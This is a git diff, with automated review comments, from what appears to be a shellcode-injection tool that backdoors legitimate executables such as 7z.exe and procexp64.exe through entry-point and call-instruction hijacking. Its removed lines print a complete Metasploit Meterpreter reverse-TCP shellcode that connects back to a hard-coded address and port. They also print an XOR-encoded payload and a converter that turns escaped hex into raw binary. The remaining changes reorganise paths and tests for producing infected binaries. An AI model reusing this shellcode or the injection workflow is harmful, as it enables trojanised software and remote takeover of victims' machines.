@@ -1,24 +0,0 @@
-# Your input string of escaped hex bytes
-#escaped_hex_bytes = "\\x31\\xc0\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x56\\x08\\x8b\\x7e\\x20"
-import sys
-infile = sys.argv[1]
-output_file_name = sys.argv[2]
-with open(infile, "r") as f:
- escaped_hex_bytes = f.read()
- escaped_hex_bytes = escaped_hex_bytes.replace('\n', '')
- escaped_hex_bytes = escaped_hex_bytes.replace('\\x', '')
-print(escaped_hex_bytes)
-# Convert the string with escaped hex bytes to actual binary data
-binary_data = bytes.fromhex(escaped_hex_bytes)
-# Write the binary data to a file
-with open(output_file_name, "wb") as binary_file:
- binary_file.write(binary_data)
-print(f"Binary file created: {output_file_name}")
\ No newline at end of file
diff --git a/shellcodes/createfile.txt b/shellcodes/createfile.txt
deleted file mode 100644
index 738b9e4..0000000
--- a/shellcodes/createfile.txt
+++ /dev/null
@@ -1,25 +0,0 @@ -\xeb\x27\x5b\x53\x5f\xb0\xa8\xfc\xae\x75\xfd\x57\x59\x53 -\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f -\xb5\x35\x74\x07\x80\x3e\xa8\x75\xea\xeb\xe6\xff\xe1\xe8 -\xd4\xff\xff\xff\x07\xa8\xfb\x4f\x84\xe3\xf7\xef\xc7\x07 -\x07\x07\x46\x56\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f -\x8c\x55\x67\x4f\x8c\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75 -\x57\x4f\x08\xb0\x4d\x4d\x4a\x36\xce\x4f\x36\xc7\xab\x3b -\x66\x7b\x05\x2b\x27\x46\xc6\xce\x0a\x46\x06\xc6\xe5\xea -\x55\x46\x56\x4f\x8c\x55\x27\x8c\x45\x3b\x4f\x06\xd7\x8c -\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73\x60\x4f\x06\xd7\x57 -\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7\xe4\x51\x4f\xf8 -\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce\x4f\x36\xc7 -\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6\x4b\x04 -\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23\x4e -\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7 -\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d -\x46\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7 -\x5f\x46\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f -\xbd\x06\x07\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06 -\x07\x07\x46\xbd\x36\x8c\x68\x80\xf8\xd2\xbc\xf7\xb2\xa5 -\x51\x46\xbd\xa1\x92\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b -\x01\x7b\x0d\x87\xfc\xe7\x72\x02\xbc\x40\x14\x75\x68\x6d -\x07\x5e\x46\x8e\xdd\xf8\xd2\x64\x6a\x63\x29\x62\x7f\x62 -\x27\x28\x64\x27\x62\x64\x6f\x68\x27\x66\x27\x39\x27\x64 -\x3d\x5b\x73\x62\x6a\x77\x5b\x66\x07\xb5\x35 \ No newline at end of file diff --git a/shellcodes/msf-meterpreter-reversetcp.txt b/shellcodes/msf-meterpreter-reversetcp.txt deleted file mode 100644 index aa48314..0000000 --- a/shellcodes/msf-meterpreter-reversetcp.txt +++ /dev/null 
@@ -1,33 +0,0 @@ -\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50 -\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52 -\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48 -\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41 -\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41 -\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f -\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0 -\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01 -\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88 -\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1 -\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8 -\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44 -\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41 -\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83 -\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9 -\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00 -\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49 -\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x58\x68\x41\x54 -\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5 -\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b -\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31 -\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41 -\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58 -\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5 -\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56 -\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04 -\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48 -\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00 -\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53 -\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89 -\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff -\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff -\xe7 \ No newline at end of file diff --git a/supermega.py b/supermega.py index 5a63fbe..c860883 100644 --- a/supermega.py 
+++ b/supermega.py
@@ -1,11 +1,9 @@
 import shutil
-from enum import Enum
 import argparse
 from typing import Dict
 import os
 import logging
 import time
-import pefile
 from helper import *
 from config import config
@@ -25,6 +23,7 @@ from log import setup_logging, writelog
 def main():
+ """Argument parsing for when called from command line"""
 logger.info("Super Mega")
 config.load()
 settings = Settings()
@@ -51,7 +50,7 @@ def main():
 config.ShowCommandOutput = True
 if args.verify:
- settings.payload_path = "shellcodes/createfile.bin"
+ settings.payload_path = "data/shellcodes/createfile.bin"
 settings.verify = True
 settings.try_start_final_infected_exe = False
@@ -59,18 +58,18 @@ def main():
 if args.verify == "peb":
 settings.source_style = SourceStyle.peb_walk
 settings.inject_mode = InjectStyle.BackdoorCallInstr
- settings.inject_exe_in = "exes/7z.exe"
- settings.inject_exe_out = "out/7z-verify.exe"
+ settings.inject_exe_in = "data/exes/7z.exe"
+ settings.inject_exe_out = "data/exes/7z-verify.exe"
 elif args.verify == "iat":
 settings.source_style = SourceStyle.iat_reuse
 settings.inject_mode = InjectStyle.BackdoorCallInstr
- settings.inject_exe_in = "exes/procexp64.exe"
- settings.inject_exe_out = "out/procexp64-verify.exe"
+ settings.inject_exe_in = "data/exes/procexp64.exe"
+ settings.inject_exe_out = "data/exes/procexp64-verify.exe"
 elif args.verify == "rwx":
 settings.source_style = SourceStyle.peb_walk
 settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm
- settings.inject_exe_in = "exes/wifiinfoview.exe"
- settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
+ settings.inject_exe_in = "data/exes/wifiinfoview.exe"
+ settings.inject_exe_out = "data/exes/wifiinfoview.exe-verify.exe"
 else:
 logger.info("Unknown verify option {}, use std/iat".format(args.verify))
 return
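Review bot: In the `@@ -59,18 +58,18 @@` hunk the verify outputs move from `out/` into `data/exes/`, so the injected carriers (`7z-verify.exe`, `procexp64-verify.exe`, `wifiinfoview.exe-verify.exe`) now sit in the same tracked directory as the clean input binaries; the `*-verify.exe` ignore rule keeps them out of git, but anything that enumerates `data/exes/` will pick up backdoored files next to the originals. A dedicated, ignored output directory — `settings.inject_exe_out = "out/7z-verify.exe"`, as before — avoids that. The unchanged error message in the `else:` branch also advertises `std/iat` while the accepted values are `peb`, `iat` and `rwx`: `logger.info("Unknown verify option {}, use peb/iat/rwx".format(args.verify))`. `main()` continues beyond the hunk.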
@@ -114,7 +113,7 @@ def main():
 if not args.shellcode or not args.inject:
 logger.error("Require: --shellcode --inject ")
- logger.info(r"Example: .\supermega.py --shellcode .\shellcodes\calc64.bin --inject .\exes\7z.exe")
+ logger.info(r"Example: .\supermega.py --shellcode .\data\shellcodes\calc64.bin --inject .\data\exes\7z.exe")
 return 1
 if args.shellcode:
@@ -133,6 +132,8 @@ def main():
 def start(settings: Settings):
+ """Main entry point for the application. This is where the magic happens, based on settings"""
+ # Delete: all old files
 if settings.cleanup_files_on_start:
 clean_files()
diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py
index 306ee62..d0b123d 100644
--- a/tests/test_datareuse.py
+++ b/tests/test_datareuse.py
@@ -8,7 +8,7 @@ from phases.datareuse import *
 class DataReuseTest(unittest.TestCase):
 def test_relocation_list(self):
- data_reuser = DataReuser("exes/7z.exe")
+ data_reuser = DataReuser("data/exes/7z.exe")
 data_reuser.init()
 relocs = data_reuser.get_relocations_for_section(".rdata")
@@ -21,7 +21,7 @@ class DataReuseTest(unittest.TestCase):
 def test_largestgap(self):
- data_reuser = DataReuser("exes/7z.exe")
+ data_reuser = DataReuser("data/exes/7z.exe")
 data_reuser.init()
 size, start, stop = data_reuser.get_reloc_largest_gap(".rdata")
diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py
index 5f57eb9..9f1bd42 100644
--- a/tests/test_derbackdoorer.py
+++ b/tests/test_derbackdoorer.py
@@ -28,13 +28,13 @@ class DerBackdoorerTest(unittest.TestCase):
 def test_backdoor_ep(self):
 # Write example shellcode
- shellcode_path = "exes/shellcode.test"
+ shellcode_path = "data/exes/shellcode.test"
 shellcode = b"\x90" * 200
 with open(shellcode_path, "wb") as f:
 f.write(shellcode)
- exe_path = "exes/iattest-full.exe"
- exe_out_path = "exes/iattest-full-test.exe"
+ exe_path = "data/exes/iattest-full.exe"
+ exe_out_path = "data/exes/iattest-full-test.exe"
 shutil.copyfile(exe_path, exe_out_path)
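Review bot: `test_backdoor_ep` in the `@@ -28,13 +28,13 @@` hunk still copies from `data/exes/iattest-full.exe`, yet this commit deletes `exes/iattest-full.exe` (`Bin 11264 -> 0 bytes`) and renames nothing of that name into `data/exes/`, so `shutil.copyfile(exe_path, exe_out_path)` raises FileNotFoundError unless the file comes from a build step not shown here. If it is a build product, skip with a clear reason when it is absent — `if not os.path.exists(exe_path): self.skipTest("iattest-full.exe not built")` — assuming `os` is imported in the test module, whose header is outside the hunk. The test also leaves `data/exes/shellcode.test` and `data/exes/iattest-full-test.exe` behind in a tracked directory that the new .gitignore does not cover; writing them under `tempfile.TemporaryDirectory()` would avoid staging injected binaries by accident. The test method continues beyond the hunk.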
@@ -59,12 +59,12 @@ class DerBackdoorerTest(unittest.TestCase):
 def test_backdoor_hijack(self):
 # Write example shellcode
 shellcode = b"\x90" * 200
- with open("exes/shellcode.test", "wb") as f:
+ with open("data/exes/shellcode.test", "wb") as f:
 f.write(shellcode)
- shellcode_path = "exes/shellcode.test"
- exe_path = "exes/7z.exe"
- exe_out_path = "exes/7z-test.exe"
+ shellcode_path = "data/exes/shellcode.test"
+ exe_path = "data/exes/7z.exe"
+ exe_out_path = "data/exes/7z-test.exe"
 shutil.copyfile(exe_path, exe_out_path)